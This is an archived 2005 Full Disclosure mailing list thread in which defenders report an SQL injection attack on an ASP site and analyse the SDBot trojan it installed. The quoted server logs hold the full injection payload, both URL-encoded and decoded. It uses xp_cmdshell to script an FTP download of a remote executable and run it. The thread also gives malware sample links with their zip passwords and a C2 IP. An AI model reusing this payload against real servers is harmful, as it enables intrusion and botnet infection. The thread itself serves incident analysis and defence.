Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

FW: Re: [Dshield] SQL injection worm ?

From: "Tim Myers" <tmyers () coactivesys com>
Date: Wed, 19 Jan 2005 16:24:58 -0500

Maxime,

Here is the information I've gathered on lol.exe. Hope this helps you out or anyone else that has this worm. Let me 
know if you need anything else. 

Tim Myers


FILE INFORMATION:
The file consists of SDBot which is a Win32 Backdoor.
Packed/Encrypted with Morphine 1.2
The trojan connects to IRC Server - 170.211.69.66:6667 Where it will wait for commands.
Drops msgfix.exe into the \windows\system32 directory and adds itself to startup via HKLM\..\..\run

IP INFORMATION:
        [170.211.69.66]
OrgName:    Arkansas Public School Computer Network 
OrgID:      APSCN
Address:    #4 State Capitol Mall, Room 401A
City:       Little Rock
StateProv:  AR
PostalCode: 72201-1071
Country:    US

NetRange:   170.211.0.0 - 170.211.255.255 
CIDR:       170.211.0.0/16 
NetName:    APSCN-1
NetHandle:  NET-170-211-0-0-1
Parent:     NET-170-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS3.STATE.AR.US
NameServer: DNS1.STATE.AR.US
Comment:    
RegDate:    1995-01-30
Updated:    2000-02-08

TechHandle: ZS25-ARIN
TechName:   State of Arkansas 
TechPhone:  +1-501-682-0500
TechEmail:  hostmaster () dcs state ar us 



SDBOT INFORMATION:
Backdoor.Sdbot is a server component (bot) that the Trojan's creator distributes over IRC channels. This Trojan horse 
allows its creator to perform a wide variety of actions on a compromised computer.

The Trojan arrives in the form of a Portable Executable (PE) file. 

When Backdoor.Sdbot is executed, it does the following:


Copies itself to the %System% folder. The file name to which it copies itself can vary. Some known file names are: 
Cnfgldr.exe
cthelp.exe
Sysmon16.exe
Sys3f2.exe
Syscfg32.exe
Mssql.exe
Aim95.exe
Svchosts.exe
FB_PNU.EXE
Cmd32.exe
Sys32.exe
Explorer.exe
IEXPL0RE.EXE
iexplore.exe
sock32.exe
MSTasks.exe
service.exe
Regrun.exe
ipcl32.exe
syswin32.exe
CMagesta.exe
YahooMsgr.exe
vcvw.exe
spooler.exe
MSsrvs32.exe
svhost.exe
winupdate32.exe
quicktimeprom.exe


NOTE: %System% is a variable. The Trojan locates the \Windows\System folder (by default, this is C:\Windows\System or 
C:\Winnt\System32), and then copies itself to that location. 


Adds one of the following values:

"Configuration Manager"="Cnfgldr.exe"
"System Monitor"="Sysmon16.exe"
"MSSQL"="Mssql.exe"
"Configuration Loader" = "aim95.exe"
"Internet Config" = "svchosts.exe"
"System33" = "%System%\FB_PNU.EXE"
"Configuration Loader"="cmd32.exe"
"Windows Explorer"="Explorer.exe"
"Configuration Loader"="IEXPL0RE.EXE"
"Configuration Loader"="%System%\iexplore.exe"
"Sock32"="sock32.exe"
"Configuration Loader"="MSTasks.exe"
"Windows Services"="service.exe"
"Registry Checker" = "%System%\Regrun.exe"
"Internet Protocol Configuration Loader" = "ipcl32.exe "syswin32" = "syswin32.exe"
"MachineTest" = "CMagesta.exe"
"Yahoo Instant Messenger" = "Yahoo Instant Messenger"
"Fixnice" = "vcvw.exe"
"Windows Configuration" = "spooler.exe"
"Microsoft Video Capture Controls" = "MSsrvs32.exe"
"Microsoft Synchronization Manager" = "svhost.exe"
"Microsoft Synchronization Manager" = "winupdate32.exe"
"Quick Time file manager" = "quicktimeprom.exe"
"cthelp"="cthelp.exe"

or a similar value to the following registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Backdoor.Sdbot contains its own IRC client, allowing it to connect to an IRC channel that was coded into the Trojan. 
Using the IRC channel, the Trojan listens for the commands from the Trojan's creator. The creator of the Trojan 
accesses the Trojan by using a password-protected authorization. 

The commands allow the Trojan's creator to perform any of the following actions: 
Manage the Backdoor installation. 
Control the IRC client on a compromised computer. 
Dynamically update the installed Trojan. 
Send the Trojan to other IRC channels to attempt to compromise more computers. 
Download and execute files. 
Deliver system and network information to the Trojan's creator. 
Perform Denial of Service (DoS) attacks against a target, which the Trojan's creator defines. 
Completely uninstall itself by removing the relevant registry entries.









-----Original Message-----
From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of 
Maxime Ducharme
Sent: Wednesday, January 19, 2005 2:13 PM
To: full-disclosure () lists netsys com; General DShield Discussion List; incidents () securityfocus com
Subject: [Full-disclosure] Re: [Dshield] SQL injection worm ?


Hi to the List

today we received the same SQL injection attack on the same URL :

IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection :
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 jan. doesnt find anything suspicious.

I'm interested if someone do an analysis on this file.

Have a nice day

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau


----- Original Message -----
From: "Maxime Ducharme" <mducharme () cybergeneration com>
To: <full-disclosure () lists netsys com>; "General DShield Discussion List"
<list () lists dshield org>; <incidents () securityfocus com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?




Hi list,
    we receveid a particular SQL injection attack on one of our site.

Attack looks like :
2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET 
/Nouvelles.asp


id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68



%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7



8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op

en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%


5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%



68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%



5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..



%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2



5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C



system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7



8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5



Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%



78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo



t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45



%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%



5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6



3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car



cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin

e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 
attacked.web.site.com - - -

HTTP request contains only 2 fields (beside HTTP method) :
Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site).

Decoded SQL injection looks like :
exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> 
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe 
%systemroot%\system32\Macromed\lolx\arcdlrde.exe >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> 
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del

%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell 
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe

y.y.y.y is a foreign IP in Europe which host FTP an WWW server.
I sent a notice this this site sysadmin about the situation.

I have been able to connect to this FTP with the account 
hahajk/hahaowned (which do not seem legit to me ...) and download suspicious files.
I mirrored them here :
http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks, they have also been advised.

I know rbot.exe is known to be Randex worm, but i'd like that have 
some other results / analysis.

I also found a "test.asp" file which contains the Spybot worm.

Weird thing is, I searched for this hosts's activity on every server 
and every firewall we run, and I only see 1 TCP connection which is 
the prepared SQL injections attack, nothing else.

Anybody see similar activity ?

I'm asking since I want to know if we are targeted by someone of by a 
worm like Santy of use search engines to find vulnerable ASP scripts.

Thanks in advance

Happy new year to everyone !

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau



-------------- Sponsor Message ------------------------------------
SANS Intrusion Immersion Training: Orlando, FL, February 3-9th
http://www.sans.org/orlando05

_______________________________________________
send all posts to list () lists dshield org To change your subscription 
options (or unsubscribe), see:

http://www.dshield.org/mailman/listinfo/list




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: